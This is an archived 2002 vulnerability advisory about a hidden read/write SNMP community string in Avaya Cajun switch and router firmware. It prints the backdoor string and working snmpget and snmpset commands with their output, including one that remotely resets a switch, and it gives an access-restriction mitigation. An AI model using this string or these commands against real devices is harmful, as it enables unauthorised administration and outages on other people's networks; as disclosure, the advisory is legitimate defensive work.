TUCoPS :: Network Appliances :: napl5598.htm

Avaya Cajun firmware hidden SNMP community allows remote control

Better a bottle in front of me than a frontal lobotomy.

6th Aug 2002 [SBWID-5598]

	AVAYA Cajun firmware hidden SNMP community allows remote control


	 Avaya Cajun P330T software version 3.8.2 and 3.9.1

	 Avaya Cajun P333R software version 3.8.1 and 3.9.1


	 Additionaly firmware for P130, M770-ATM and M770 Supervisor (M-SPX, M-SPS)

	 was found to be vulnerable.


	 The vulnerability is also present on P333R router interfaces


	Jacek   Lipkowski    [sq5bpf@andra.com.pl]    of    Andra    Co.    Ltd.
	[http://www.andra.com.pl] says :


	There exists an undocumented SNMP r/w community string in  firmware  for
	Avaya Cajun P33x series hardware. This allows anyone having SNMP  access
	to the device to administer  it.  Various  Cajun  firmware  contains  an
	undocumented community r/w string NoGaH$@! To test try:

	sq5bpf@hash:~$ snmpget 'NoGaH$@!' system.sysName.0

	system.sysName.0 = AsnNull

	sq5bpf@hash:~$ snmpset 'NoGaH$@!' system.sysName.0 s 'Hello there :)'

	system.sysName.0 = Hello there :)

	sq5bpf@hash:~$ snmpget 'NoGaH$@!' system.sysName.0

	system.sysName.0 = Hello there :)


	Reset a Cajun switch remotely (fun party trick):

	sq5bpf@hash:~$ snmpset 'NoGaH$@!' . i 1

	enterprises. = 1


	P333R router :

	sq5bpf@hash:~$ snmpget 'NoGaH$@!' system.sysDescr.0

	system.sysDescr.0 = Avaya Inc. - P333R , SW version 3.9.1 , CS 2.4






	restrict SNMP access using the 'set allowed managers' command




	Avaya support site http://support.avaya.com

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH